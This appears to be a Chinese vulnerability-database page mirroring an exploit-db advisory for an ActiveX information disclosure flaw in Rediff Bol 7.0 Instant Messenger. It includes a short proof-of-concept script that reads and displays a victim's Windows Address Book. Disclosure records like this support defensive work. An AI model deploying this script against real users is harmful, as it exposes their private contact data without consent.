Rediff Bol 7.0 Instant Messenger – ActiveX Control Information Disclosure

Rediff Bol 7.0 Instant Messenger – ActiveX Control Information Disclosure

漏洞ID 1055364 漏洞类型
发布时间 2005-09-05 更新时间 2005-09-05
图片[1]-Rediff Bol 7.0 Instant Messenger – ActiveX Control Information Disclosure-安全小百科CVE编号 N/A
图片[2]-Rediff Bol 7.0 Instant Messenger – ActiveX Control Information Disclosure-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/26221
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/14740/info

Rediff Bol Instant Messenger is prone to an information disclosure vulnerability. A malicious ActiveX control could allow an attacker to obtain the contents of a vulnerable user's Windows Address Book. 

[script]
var Obj = new ActiveXObject("Fetch.FetchContact.1");
alert(Obj.FullAddressBook(0,"","",""));
[/script]

相关推荐: PHPBB Search.PHP “search_author” Cross-Site Scripting Vulnerability

PHPBB Search.PHP “search_author” Cross-Site Scripting Vulnerability 漏洞ID 1076210 漏洞类型 Input Validation Error 发布时间 2004-07-19 更新时间 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享